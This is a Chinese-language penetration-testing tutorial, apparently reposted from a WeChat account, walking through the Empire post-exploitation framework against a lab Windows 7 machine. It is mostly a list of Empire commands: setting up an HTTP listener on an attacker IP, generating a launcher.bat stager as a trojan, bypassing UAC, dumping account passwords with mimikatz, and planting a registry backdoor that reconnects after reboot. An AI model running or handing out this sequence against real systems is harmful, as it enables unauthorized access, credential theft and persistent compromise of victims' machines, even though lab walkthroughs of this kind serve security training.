欢迎回来,我的新手黑客
Empire是一个开发后框架,包括纯PowerShell2.0 Windows代理和纯Python 2.6 / 2.7 Linux / OS X代理。它是以前的PowerShell Empire和Python EmPyre项目的合并。该框架提供了密码安全的通信和灵活的体系结构。在PowerShell方面,Empire实现了运行PowerShell代理的能力,而无需powershell.exe,从键盘记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中
使用Empire设置监听器,进入监听器模块
使用http类型的监听器
uselistener http
查看模块参数
info
修改name参数和BindIP
set Name win7
set BindIP 192.168.0.104
激活监听器
execute
生成木马
使用launcher_bat
usestager windows/launcher_bat
info
set Listener win7
在/tmp路径下生成launcher.bat文件
等待用户上线
查看agent
agent
将agent命名一个比较好记的名字
进入agent
interact win7
查看信息
info
没有权限,查看该用户是否在Administrators组里
shell net localgroup Administrators
该用户在管理员组,因为UAC的原因所以没有管理员权限,接着来尝试PassUAC
bypassuac win7
提权成功,查看agent
带*号的为管理员权限的agent,修改Name,进入该agent
查看简要信息
权限满足要求,提取该设备上账号密码信息
mimikatz
一会儿之后,查看账号密码
creds
使用rdesktop登录
接下来来看一下持久后门
usemodule persistence/elevated/registry*
查看模块简要信息
设置参数
set Listener win7
查看靶机注册表相应位置
接下来测试一下持久后门,靶机重新开机
成功回连,持久后门生效
原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢
原文始发于微信公众号(Kali渗透测试教程):Empire之权限提升获取账号密码和注册表留持久后门
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论